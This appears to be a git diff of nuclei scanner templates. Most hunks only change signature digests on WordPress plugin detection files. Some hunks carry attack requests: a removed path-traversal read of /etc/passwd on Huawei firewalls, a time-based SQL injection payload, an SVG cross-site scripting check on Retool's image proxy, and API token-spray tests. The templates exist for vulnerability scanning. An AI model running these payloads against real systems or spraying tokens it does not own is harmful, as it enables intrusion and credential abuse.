4b0a004830460221009ea6099f2c81446388d1c85117955eb4c5daab4bc0a85aca97e05aa89cf0b023022100f877a93161d1422cf1944c42312ac83a99be650fb608bb69026676de72dc3887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index f148d623ab..95c47b951a 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203d9a88ac0c397984c946f83558f46019cfe9c434ffa34ae3e7412a4904b1199b022017272467b4e1dd344edb7811ecaa92700d110e1453189997c4170d2f430be077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022009862f5090bcabc1481667891c045ce3eb89480571111a66054825cacbb389be0220664096771d83d611853cbd9606b10372946408b22555f49961a415245cf6e5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 01a3669132..61a42d65c2 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210088ab3382146d68df37c2f34a7d8160b4b6b5d467777f222b1d1a82a5c7c59ad6022100a62942397e0aa2a3c3048f663baca48a04a4611ffb8369449f8efda752262837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index dc5fbcf73d..9571b70287 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220282625a991751278b7e838a1580b0e7ccb71a939729d20a28f49fee27ae886d40220271e748ab5322066f7fb89ffa1d3d6525258bd0bb2484bb9393e99371dab366c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022078b0988b416e33454672ba16004f5bcbc39b6cba905f9812a9bcb412f6c80f1002204cbad29f078c2b2783edb2a5cb6668a9b9f0341324d642ed576ed686bbff7fb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index e88653232a..ffa9d02a37 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad5e88cf279b654c80f86a306e77a250f8be6d371399d866c650e7a41e6a39c90221009a2a4f59bf7cf66e1a895e4dc19f3cf647bef66a6747976caba1589f6f0fef20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ae8f158ee989f4bd9ec309bd9c3ff97dc7d20e6d2be0157954bda6c9612149200220407ddbe289fe1ec83e790c7ebe571b79296db8eb99fd884ec089919d828413ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 23062fbc88..5356cdf582 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202eedc247e1e6705caff46495670c26f5f7c8c7834e1b6deba3bb0c776fb6117802202460f9ac8240f9f4433e70025c5cb5103bd82f9a1d1e8d39d4c7e246a1a2078e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b4fac19244ac3d2c8054abcfdf296b43fe955750c41e8cb5fceef4809e9c544a022100f89ea12f83c1d1a5f558c0ec87c9a60019e94498fe5957877d4f2ab3e642be80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index c40541f2a6..2f0a7b1884 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220491867af97388ba6ffcda09ac8c9a8f066e34ca594733d10e1dcdfb894294e67022100af363d3174a83346cdc3e55ebc9b628e59d75822d157ac9d949813be4ff655e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bc86e394e74e63fce24b1e215d46f8e24e5a6641130db0a4c2873b686f5e361b022063b3698cd6ac705dce771947eeb47912df1a019baaac1c6d09407e59f1a2bf53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 71967fdc16..d9c3a349d0 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b1145d7487d6a9131d1aa211b1a95aed2376f6daec08fac15abe78d9e4fe8b8b022100bbd20d6603372a5c11fab3893ef3fb1907a8a243d5b536d30287943d459f802f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205629ecbcdf64b69591a06c6b96d5aa534833d69227717fa634f70f0ed87b63e2022100f05d7262a76d0d065e16aa5016110ceec8a9b2e9b2684de9ee027134dc860914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index cf207f2019..626ada4531 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201b8bf1ef746129bce1e1cca5407c10f50c3510f9b09b7d51efbe5e701dbea00b022100f5b375f91a5cf3236a88c1703d59c9131272822accaf70b8a4637a0246441104:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100dab8fdec895415d0e65a0f058bc90509141c4bc6bde323186e53a5be771d7763022100b400b3080d4d4cb7262d7b935e3e8b8b057072574ad0f1a90e993c2f7d09b563:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 4c31940c28..cdb9a1be8c 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fef2816523e3c204920283c8bb132fd96b70ef73af7edf4fa2e8b44a1fc0ac3402204c09591f318b34f776c80a8d5d76cace448e4f767b4a98729204bf6be11f44a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009ccca7c58fa27f40949bf77c34e8e2f89ac12140b1dc5ae5eddd7d34996d13a60220685f9d552be6eeb9e6559053144f9e50568e7b1f746994255faf7946d1b7ce3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 420093d13b..a32972054f 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb1d1fafb3410eddee57e2ed7fc096f41b523b41be10dec9fee0143b11f13c7a0220093a4e5153bb54aee95d4cd262ea1ee4f2453bae69ac81045705a979dbc14960:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022042a733c3a44486a0ca7d6ee01f1b3abb66d0f563a205459598b54cc641329c4002207cf69493fbafe44abda598a7a2f8ebaf39b321104c945a4ae71d95a72e9f206d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 653faa35fe..34a84d09d2 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d119d155cdc07d4ec2c287c047a4d826e75ccd9028a388aba69dddc2dcbf39c02200de02410831f468f78bd2b244f37c25168c0af826db892e79feee79ebb50d0f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f28688b4d94adcd1d2dc33523b4735c864284f4cd8d4a28ddee1f9f8106c63e602205778491b59ad85ec64ae868a8801f593be4b9f92a05e3a1510e3a46b13a28d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index b834364475..5b49db77e1 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100abc59f7f046cfdb716e4f4e8a27ecefa712e5cb029399487d672e7b17d7ef9ae02202154b479bb2ba0defc3728a2aae52e89ff43f8b478d198e58d918815e017a392:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ceb06e52c91689a13537fd3b9f88ea1589e604ded5fb46daa35fcca1a2608955022065ec9dfe09e09b9614a457ef3314fdba848dc9d678651892d849ce6f30ddd95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index d8aca5090b..667a848347 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009214407de6d236f484e7a68fed2ff91b3c6f57bdc88c5ebcbc13d8f62c166cb402202ccbf1e8a94ae0335040bc72fc66fcd4db77962d8afbf4d83d357b2f37098156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b920e89cd0adeb3c46592e7895b3afd12d8d8bf5b35109019dd7ee02f9cb793302204d761b32b77f0310631bf62858bae25ffdccc7d00d7ec5fe81e0ca9852f0eb00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index a33ac1d30d..93ce46b727 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009cf97d37b2809e22cb6b7785745c5bfa8f77a27c7ad63eded7367ce83028f4590221008c7165d39482f6ae1ea80f42a0b7ef91abfd83e90dcf7f74eb6c5035ebd351fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206dea9c363919036642882cf1107a6c7e9c8fe4841c5c1b6c1c9c057097e2eb79022100c905a3c1dedd9a0e192ac43b22eb83884023b5e4770e20c4568d9ba0765adf1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 8750590650..a4fd99bc02 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210089108370eaf8166035982640cb5968748d2f1565c50a68efdf172c497f04318f022100c139b340d37dc6d4ea7f32d65328fc59a403bb765b1cf11d7955c49b71bebe89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c4d9198dd470ea54d3e6022c0df011e72af5b13128367af69e125bf8b298e133022100cb08dd81a8321745d8212febd4a1bd8465e7fb76de0347277c7b218004ed889e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9d849de5..3e1a4210e6 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e55eb96a1630780e7d9a849b8f2a18149e0d096eef8ea585aaafdda2bfd584f902203b7ac6b4c8801f0c1b9d82769ca3b899c5b10563262c25c0bc6794ea589ac02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a860e2b990fed36a80da1af1305c258c4e79d72a9b5017b1feeb7bc3f66a37d7022044f4bde1a41196d1bf810309e6ed3a341f3f9b95bf0fd6ba036b325030b26e6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 51ecbdae94..ab140de36c 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052f1d20e480d16c4a0f396685eb45c029814a84cc217dc16b50c33a5e9b94223022033e7f9a929c06f3500731566d829e6cd9e34c6882c07534d0db6615501661eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b3058099be1aea3e5c9aa40adfd688d04519828bd1ed7182b110bc8fbe52c57802206a752c439d75260b928d0dfc136a6e44fcaa92296837404cff3b1aeaa85794bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 98d74ba5f0..04dae68703 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3082612f8ff17589cf8e553112ba2f08df4c0a869cae3d65d7b458d3d8b92e0022100aca8cf872cdc20054a9143886d09aaef233830bbabf85fc636c7f3f6cb1c3640:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f892e01a2bd091e73c1f982e230677ea116e46aed3731879cba456c33fda96f80221008d075821976316454a37b59d57204ed339716f197fccd72bbfec1e69779d7012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 7de6e64bdf..34d3cb5238 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bc14fbde7d1d4b1150e962947f426fd2a2141d8fe9d37e02f5e1766195a46af002204488c82d79cc381f0fef34933976d314f39475191a2a9e8975bb5238454903b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a2c57ad1fb54c82d10d3d474f589a6881eb4cbb17cc762fe79b6b8b46b7ab1d5022021f0638f24984822e4df2f99aedb05cddf10c0f8b87d7820e4bc7fa5fd3a262f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 9c98c74b84..60d0b1540e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201946c2c3522c66797fa2bf734bd1c127b81227cfecdd4636f2769db6a3e2f0260220372d1abdf54d12df4181b4cfa08511889c93d8b40e03b77a3fd7c10925fc5149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ae2723935d5831732a338e16ef30c713fbb9bc5ec6e7b9e986caba6fcea5a14e0220300264de71e5fb8602706c48ef76a31a6ae5f285d628de41a18fc63c749f3c1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 8d7691daae..e1843fafbd 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009507a688b01299148b87689ea24d0695950fd158a3f9f97c1565733d99e66a36022100ab5015aededf034cf6240ea1e532836784eedb2d8fbb021c115e06006b290a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dca8a23e86cbc5b592ea2694a14d9fc4057d43eb1c6e7520d4ca5c658ea5768f0220356a091d1d95a5a41f6bc586114b90dac9d7204bfd73d88be4ceffe93f634519:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/token-spray/api-intigriti.yaml b/http/token-spray/api-intigriti.yaml new file mode 100644 index 0000000000..2421807673 --- /dev/null +++ b/http/token-spray/api-intigriti.yaml @@ -0,0 +1,47 @@ +id: api-intigriti-researcher + +info: + name: Intigriti-Researcher API Test + author: 0xpugal + severity: info + description: The Intigriti researcher API can be used to query information about Programs you have access to via our platform and Program activities you have access to via our platform + reference: + - https://kb.intigriti.com/en/articles/8529303-intigriti-researcher-api + metadata: + verified: true + max-request: 1 + tags: token-spray,intigriti + +self-contained: true + +http: + - method: GET + path: + - "https://api.intigriti.com/external/researcher/v1/programs" + + headers: + Authorization: Bearer {{token}} + Content-Type: application/json + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"records"' + - '"webLinks"' + - '"detail"' + - '"handle"' + - '"value"' + - '"status"' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 +# digest: 4a0a00473045022100eed8b3b90cbae21389c6cfd08915f3e877eeaf5392212db6cf1ecfef4afd40d7022073147511005a6d3e8497e3ea50b3cdb45cf53e5bd1149563566bc0e2b7bbdf2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/token-spray/api-sendgrid.yaml b/http/token-spray/api-sendgrid.yaml index af16bcb86e..10007198f8 100644 --- a/http/token-spray/api-sendgrid.yaml +++ b/http/token-spray/api-sendgrid.yaml @@ -2,26 +2,41 @@ id: api-sendgrid info: name: Sendgrid API Test - author: zzeitlin + author: zzeitlin,0xpugal severity: info + description: | + A REST-like interface that enables you to send email at scale, ensuring your application can handle high-volume email with ease. reference: - - https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp + - https://www.twilio.com/docs/sendgrid/api-reference/how-to-use-the-sendgrid-v3-api metadata: + verified: true max-request: 1 - tags: token-spray,sendgrid,tcp + tags: token-spray,sendgrid self-contained: true -tcp: - - inputs: - - data: "ehlo\r\n" - read: 1024 - - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" - read: 1024 - host: - - "tls://smtp.sendgrid.net:465" +http: + - method: GET + path: + - "https://api.sendgrid.com/v3/scopes" + + headers: + Authorization: Bearer {{token}} + Content-Type: application/json + + matchers-condition: and matchers: - type: word + part: body words: - - "Authentication successful" -# digest: 4a0a00473045022100dd0126de2635a7816f1b70810b95b2f69cfac0bc32ced3b9cdba6128f0569e7e022079a7f2887dc7aeae9b53a136124d415bf357bfe0d7bc6e47de8dad5f95d12d41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '"scopes":[' + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100bfec8ef43250a5deeaddf82e4b5479d31149745b1b236041b9e9e707154dc562022100e8b38dec5cd4a3de4997df78b3278ebac2a8e954727b5ffc1f186634b3956e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/huawei/huawei-firewall-lfi.yaml b/http/vulnerabilities/huawei/huawei-firewall-lfi.yaml deleted file mode 100644 index b7de3fca68..0000000000 --- a/http/vulnerabilities/huawei/huawei-firewall-lfi.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: huawei-firewall-lfi - -info: - name: Huawei Firewall - Local File Inclusion - author: taielab - severity: high - description: Huawei Firewall is vulnerable to LFI(Local File Inclusion) - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - verified: true - max-request: 1 - shodan-query: title:"HUAWEI" - tags: huawei,firewall,lfi - -http: - - method: GET - path: - - "{{BaseURL}}/umweb/../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:[x*]:0:0:" - - - type: word - part: header - words: - - "application/octet-stream" - - - type: status - status: - - 200 -# digest: 490a0046304402203715844af65d7d74d1aeca35c55b6c24a7cbfa49fa1a202ff28631bb9ee56913022069383aa92060d5f57f72215e131edaa486e6b8a773e18332ebce0d6af51d5829:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/fumengyun-sqli.yaml b/http/vulnerabilities/other/fumengyun-sqli.yaml index d51dad1282..37665dde85 100644 --- a/http/vulnerabilities/other/fumengyun-sqli.yaml +++ b/http/vulnerabilities/other/fumengyun-sqli.yaml @@ -36,6 +36,7 @@ http: GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1 Host: {{Hostname}} + stop-at-first-match: true matchers-condition: or matchers: - type: dsl @@ -49,6 +50,8 @@ http: name: time-based dsl: - 'duration_2>=6' - - 'contains_all(response_2, "0", "text/plain")' + - 'len(body_2) == 1' + - 'regex("^0$", body_2)' + - 'contains(content_type_2, "text/plain")' condition: and -# digest: 4a0a004730450220093e0ab367ad9bd0fb821ab8a76348d35fdccfcdceb731ab028dd494d3e58ba702210082b1ed2a0e9f9d628c6d0d16a48f346fecd912251491470e4926509bf6fb6baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae1de48c3420836a939b97509d95a1ad53e9481ea5e8680a0d411d0ccbd77c5c022100c5061fdb58d047ed2a6a44fa30f2b40ff991cfd291bc19817888b8d2bbd39224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/retool/retool-svg-xss.yaml b/http/vulnerabilities/retool/retool-svg-xss.yaml new file mode 100644 index 0000000000..38dd3e5545 --- /dev/null +++ b/http/vulnerabilities/retool/retool-svg-xss.yaml @@ -0,0 +1,42 @@ +id: retool-svg-xss + +info: + name: Retool < 3.88 - SVG Cross-Site Scripting + author: iamnoooob,iamnoooob,pdresearch + severity: high + description: | + This template checks for SVG Cross-Site Scripting(XSS) vulnerability via the Image Proxy URL parameter in Retool. + reference: + - https://docs.retool.com/releases/edge/3.88#:~:text=Fixed%20an%20SVG%20XSS%20vulnerability%20by%20adding%20a%20CSP.%20(%2349381) + metadata: + verified: true + max-request: 1 + fofa-query: body="x-retool" + tags: retool,xss + +http: + - raw: + - | + GET /api/imageProxy?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/eb8e32c9393677006c2ea916f2e3010c2bd8e03f/helpers/payloads/retool-xss.svg HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert('document.domain');" + - "<?xml version" + - '<script type="text/javascript">' + condition: and + + - type: word + part: header + words: + - "Content-Security-Policy: default-src 'none';" + negative: true + + - type: status + status: + - 200 +# digest: 4b0a00483046022100ba07c7c3588fd040369449b1481861063244dd67ad6593b8c5027eda6c065553022100e0ddc7d713fc2ec6f387e8483408a2697510f9023bf23d3ff229fda094b6894a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates-checksum.txt b/templates-checksum.txt index 87861e4ee8..253fe5a989 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1,5 +1,5 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 -CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 +CONTRIBUTING.md:2a3eb51d00e6dc20f0d98db5996f905ca347d1ac LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 README.md:5ccedf3ac25ae1bbe61c8bd72d00735183ab7ca4 @@ -341,6 +341,7 @@ code/cves/2023/CVE-2023-4911.yaml:42a625449ef87ff1c259f6dedeca315142e5269a code/cves/2023/CVE-2023-6246.yaml:8058db855cf5f4eacb8c8c731b1febe24f11c6e1 code/cves/2024/CVE-2024-22120.yaml:b3f227b2953c487bb5d4ecbcc73530ca5de106a4 code/cves/2024/CVE-2024-3094.yaml:5982cc7d1de61a63e86645d8735de6236c9a074d +code/cves/2024/CVE-2024-45409.yaml:cd00aa93522a7ed7dea4353aac84e1b061ea515b code/privilege-escalation/linux/binary/privesc-aa-exec.yaml:03e874f0a174244627cc2c167c3d9829bf12f260 code/privilege-escalation/linux/binary/privesc-ash.yaml:a19a050317a19374ca4edc12474fd1de3600999b code/privilege-escalation/linux/binary/privesc-awk.yaml:0fb5884b81ce822978b5c9fbbd5d266333e002be @@ -416,8 +417,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:0faa192f1ba678c16f6d772222aa61749edb80ec -cves.json-checksum.txt:c1403c260787a18d81f3915ea1b0ab6c8012a27b +cves.json:8179e8da491a35965e311a1dde03160a8f4386e9 +cves.json-checksum.txt:59a5f338ef1fa2e165c4d5a34613855223d7da63 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -910,9 +911,10 @@ helpers/payloads/cve-2023-34039-keys/id_rsa_vnera_keypair_6.8.0_platform:f313761 helpers/payloads/cve-2023-34039-keys/id_rsa_vnera_keypair_6.9.0_collector:1efb4cc54ae18159e7ed9f94d71eb30df5c82db8 helpers/payloads/cve-2023-34039-keys/id_rsa_vnera_keypair_6.9.0_platform:7bae590cb5bef1589d32311f61d1a7728d3d9847 helpers/payloads/request-headers.txt:b85d7c53290237323b5374416fbec07237941aa9 +helpers/payloads/retool-xss.svg:8e6f089eecda5994d276216145a1c92f195db9ce helpers/payloads/swagger-payload:6e0a08fc7310a1ce07226a012520ba1f73029945 helpers/payloads/wp-social-warfare-rce.txt:6b93ad84c3035c6779d75057e645171476cbc530 -helpers/wordlists/adminer-paths.txt:9f33fac4208dc50e34c0360e68ec4ef17a1c2c92 +helpers/wordlists/adminer-paths.txt:3bd330450f41578a8c2d002c6b85face968e2e7a helpers/wordlists/grafana-plugins.txt:0621c38f856c64ac8c96e53b96bc90881fe35704 helpers/wordlists/headers.txt:1d92a664669f50906e4ad90d299f78cbeb6f8687 helpers/wordlists/mdb-paths.txt:c380943cfa8a337ccb1ea38062e2856924960f1a @@ -929,7 +931,7 @@ helpers/wordlists/wordpress-plugins.txt:16f9c56f785157dcea0ef4cf90364a0c0cd8ff50 helpers/wordlists/wordpress-themes.txt:3424134fa69db08604545ecf1441cf6330bf0982 helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b 